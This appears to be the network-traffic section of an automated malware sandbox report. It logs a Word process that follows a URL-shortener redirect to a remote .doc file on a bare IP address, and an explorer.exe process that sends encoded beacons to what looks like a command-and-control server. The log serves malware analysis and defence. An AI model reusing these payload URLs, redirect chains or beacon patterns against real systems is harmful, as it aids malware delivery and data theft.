                                              18192.168.2.2249199188.114.96.380C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jun 13, 2023 11:03:22.576448917 CEST1201OUTGET /hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl+Hl3kcfMygwQj+X1OmQGQg==&MJELdT=OHKPl0&sql=1 HTTP/1.1
                                              Host: www.orbit4dads.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jun 13, 2023 11:03:22.603111982 CEST1202INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 13 Jun 2023 09:03:22 GMT
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Tue, 13 Jun 2023 10:03:22 GMT
                                              Location: https://www.orbit4dads.com/hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl+Hl3kcfMygwQj+X1OmQGQg==&MJELdT=OHKPl0&sql=1
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cu75kuTRmUFD4IZG7i3i2g4EWjFleZeQny%2FjL0nR52XSdyhXPEtFFZx3Xo1XcclquxZRfU4ciFrXdwNQu3ZDIfvXrE1jvW7T3rq5v3NNRRE%2FQsgNsfPWGLERG8rMoo5o5QWXk5w%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 7d6928f61e953686-FRA
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249183103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.2249184103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.2249185103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.2249186103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.2249187103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.2.2249189103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.2.2249191103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.2.2249192103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249181103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:04 UTC0OUTOPTIONS / HTTP/1.1
                                              User-Agent: Microsoft Office Protocol Discovery
                                              Host: unesa.me
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              2023-06-13 09:01:05 UTC0INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1n; path=/
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:05 UTC0INData Raw: 31 39 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65
                                              Data Ascii: 192c<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <me
                                              2023-06-13 09:01:05 UTC1INData Raw: 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 73 63 72 65 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64
                                              Data Ascii: 100%; } </style> </head> <body id="screen-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand
                                              2023-06-13 09:01:05 UTC2INData Raw: 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 73 74 6f 72 65 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c
                                              Data Ascii: <form action="store.php" method="post"> <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" pl
                                              2023-06-13 09:01:05 UTC4INData Raw: 6c 6f 61 64 69 6e 67 3d 27 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 70 69 6e 6e 65 72 20 66 61 2d 70 75 6c 73 65 22 3e 3c 2f 69 3e 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                              Data Ascii: loading='<i class="fas fa-spinner fa-pulse"></i>'> SINGKATKAN</button> </div> </div> </form> </div> </
                                              2023-06-13 09:01:05 UTC5INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 66 6c 65 78 2d 73 6d 2d 72 6f 77 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20
                                              Data Ascii: <ul class="nav flex-column flex-sm-row text-center" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249182103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:06 UTC6OUTHEAD /oaeopb HTTP/1.1
                                              Connection: Keep-Alive
                                              Cookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1n
                                              User-Agent: Microsoft Office Existence Discovery
                                              Host: unesa.me
                                              2023-06-13 09:01:07 UTC7INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-XSS-Protection: 1; mode=block
                                              Location: http://15.223.2.12/we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249183103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:10 UTC7OUTOPTIONS / HTTP/1.1
                                              Connection: Keep-Alive
                                              Cookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1n
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              translate: f
                                              Host: unesa.me
                                              2023-06-13 09:01:11 UTC7INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:11 UTC8INData Raw: 65 39 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65 74
                                              Data Ascii: e91<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <met
                                              2023-06-13 09:01:11 UTC9INData Raw: 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 20 70 74 2d 34 20 70 74 2d 6d 64 2d 35 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 20 63
                                              Data Ascii: en-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand-lg navbar-dark pt-4 pt-md-5 "> <div class=" c
                                              2023-06-13 09:01:11 UTC10INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 52 4c 2f 20 54 61 75 74 61 6e 20 50 61 6e 6a 61 6e 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 6d 70 65 6c 20 74 61 75 74 61 6e 20 75
                                              Data Ascii: <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" placeholder="URL/ Tautan Panjang" aria-label="Tempel tautan u
                                              2023-06-13 09:01:11 UTC11INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                              Data Ascii: SINGKATKAN</button> </div> </div> </form> </div> </div> </div> </di
                                              2023-06-13 09:01:11 UTC13INData Raw: 74 2d 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: t-center" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a> </li>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.2249184103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:11 UTC14OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6f 63 64 6a 30 69 6c 76 73 70 62 37 32 75 76 73 32 35 66 39 71 6d 39 6e 31 6e 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 65 73 61 2e 6d 65 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1nUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: unesa.me
                                              2023-06-13 09:01:12 UTC14INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:12 UTC15INData Raw: 31 39 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65
                                              Data Ascii: 192c<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <me
                                              2023-06-13 09:01:12 UTC15INData Raw: 65 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 20 70 74 2d 34 20 70 74 2d 6d 64 2d 35 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 20
                                              Data Ascii: een-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand-lg navbar-dark pt-4 pt-md-5 "> <div class="
                                              2023-06-13 09:01:12 UTC17INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 52 4c 2f 20 54 61 75 74 61 6e 20 50 61 6e 6a 61 6e 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 6d 70 65 6c 20 74 61 75 74 61 6e 20
                                              Data Ascii: <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" placeholder="URL/ Tautan Panjang" aria-label="Tempel tautan
                                              2023-06-13 09:01:12 UTC18INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20
                                              Data Ascii: SINGKATKAN</button> </div> </div> </form> </div> </div> </div> </div>
                                              2023-06-13 09:01:12 UTC20INData Raw: 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                              Data Ascii: er" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a> </li> <l


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.2249185103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
